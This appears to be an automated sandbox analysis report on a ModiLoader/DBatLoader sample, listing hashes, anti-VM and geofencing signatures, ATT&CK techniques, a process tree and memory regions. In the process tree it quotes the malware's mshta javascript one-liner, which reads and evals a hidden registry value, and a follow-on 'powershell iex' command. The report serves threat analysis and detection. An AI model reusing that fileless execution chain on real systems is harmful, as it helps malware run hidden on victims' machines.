Analysis

  • max time kernel
    135s
  • max time network
    126s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    16-05-2024 04:57

General

  • Target

    497f7d69be6c9ba572ad8096d762eed9_JaffaCakes118.exe

  • Size

    356KB

  • MD5

    497f7d69be6c9ba572ad8096d762eed9

  • SHA1

    38c86a5632b5e9ea39dbc21096b3401dc8944e75

  • SHA256

    2f4dbe106abeb7bd9cb954ab1997d25cef95da32d614e6bb2cb962543d07b89f

  • SHA512

    3434b179cd56847dc3f588ec7aec22622416848bdeb5c38f569cf0b616417aaeb7e3ac13698f1e64764816ac86383df26dac1fc5990590077bbf38dcde383083

  • SSDEEP

    6144:Sae/c0RVIqxFu4s2a9XHCd9hxJamsAT4k+wCGbfQfojzMBR5i:W/cMVDxFu43cHYf1TPCAxjzMU

Malware Config

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs
  • ModiLoader Second Stage 14 IoCs
  • Looks for VMWare Tools registry key 2 TTPs 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\497f7d69be6c9ba572ad8096d762eed9_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\497f7d69be6c9ba572ad8096d762eed9_JaffaCakes118.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Looks for VMWare Tools registry key
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:3248
    • C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\497f7d69be6c9ba572ad8096d762eed9_JaffaCakes118.exe
      "C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\497f7d69be6c9ba572ad8096d762eed9_JaffaCakes118.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Looks for VMWare Tools registry key
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      PID:4252
  • C:\Windows\system32\mshta.exe
    "C:\Windows\system32\mshta.exe" javascript:MWxN6CS4V="w";Jq7=new%20ActiveXObject("WScript.Shell");gLJo6hQGm9="6";h8muY=Jq7.RegRead("HKLM\\software\\Wow6432Node\\2yxCeUs0\\vNJBdU");tY9nHTB="auPDje7Q";eval(h8muY);BKDK60gPL="e";
    1⤵
    • Process spawned unexpected child process
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:5048
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:qdmff
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2080

Network

MITRE ATT&CK Matrix ATT&CK v13

Defense Evasion

Virtualization/Sandbox Evasion

2
T1497

Discovery

Query Registry

3
T1012

Virtualization/Sandbox Evasion

2
T1497

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cqlgau4q.pzq.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\497f7d69be6c9ba572ad8096d762eed9_JaffaCakes118.exe
    Filesize

    356KB

    MD5

    497f7d69be6c9ba572ad8096d762eed9

    SHA1

    38c86a5632b5e9ea39dbc21096b3401dc8944e75

    SHA256

    2f4dbe106abeb7bd9cb954ab1997d25cef95da32d614e6bb2cb962543d07b89f

    SHA512

    3434b179cd56847dc3f588ec7aec22622416848bdeb5c38f569cf0b616417aaeb7e3ac13698f1e64764816ac86383df26dac1fc5990590077bbf38dcde383083

  • memory/2080-20-0x0000000004730000-0x0000000004766000-memory.dmp
    Filesize

    216KB

  • memory/2080-38-0x0000000006030000-0x000000000604A000-memory.dmp
    Filesize

    104KB

  • memory/2080-37-0x0000000007360000-0x00000000079DA000-memory.dmp
    Filesize

    6.5MB

  • memory/2080-36-0x0000000005BF0000-0x0000000005C3C000-memory.dmp
    Filesize

    304KB

  • memory/2080-35-0x0000000005B40000-0x0000000005B5E000-memory.dmp
    Filesize

    120KB

  • memory/2080-34-0x00000000055E0000-0x0000000005934000-memory.dmp
    Filesize

    3.3MB

  • memory/2080-24-0x0000000005570000-0x00000000055D6000-memory.dmp
    Filesize

    408KB

  • memory/2080-23-0x0000000005500000-0x0000000005566000-memory.dmp
    Filesize

    408KB

  • memory/2080-22-0x0000000005420000-0x0000000005442000-memory.dmp
    Filesize

    136KB

  • memory/2080-21-0x0000000004DA0000-0x00000000053C8000-memory.dmp
    Filesize

    6.2MB

  • memory/3248-9-0x0000000002A50000-0x0000000002B24000-memory.dmp
    Filesize

    848KB

  • memory/3248-0-0x00000000021C0000-0x0000000002207000-memory.dmp
    Filesize

    284KB

  • memory/3248-41-0x0000000002A50000-0x0000000002B24000-memory.dmp
    Filesize

    848KB

  • memory/3248-40-0x0000000000440000-0x0000000000445000-memory.dmp
    Filesize

    20KB

  • memory/3248-15-0x0000000002A50000-0x0000000002B24000-memory.dmp
    Filesize

    848KB

  • memory/3248-11-0x0000000002A50000-0x0000000002B24000-memory.dmp
    Filesize

    848KB

  • memory/3248-12-0x0000000002A50000-0x0000000002B24000-memory.dmp
    Filesize

    848KB

  • memory/3248-13-0x0000000002A50000-0x0000000002B24000-memory.dmp
    Filesize

    848KB

  • memory/3248-14-0x0000000002A50000-0x0000000002B24000-memory.dmp
    Filesize

    848KB

  • memory/3248-16-0x0000000002A50000-0x0000000002B24000-memory.dmp
    Filesize

    848KB

  • memory/3248-10-0x0000000002A50000-0x0000000002B24000-memory.dmp
    Filesize

    848KB

  • memory/3248-5-0x0000000000400000-0x000000000043E000-memory.dmp
    Filesize

    248KB

  • memory/3248-6-0x0000000000440000-0x0000000000445000-memory.dmp
    Filesize

    20KB

  • memory/3248-7-0x0000000000540000-0x0000000000547000-memory.dmp
    Filesize

    28KB

  • memory/3248-1-0x00000000021C0000-0x0000000002207000-memory.dmp
    Filesize

    284KB

  • memory/4252-18-0x0000000001F90000-0x0000000001FD7000-memory.dmp
    Filesize

    284KB

  • memory/4252-19-0x0000000001F90000-0x0000000001FD7000-memory.dmp
    Filesize

    284KB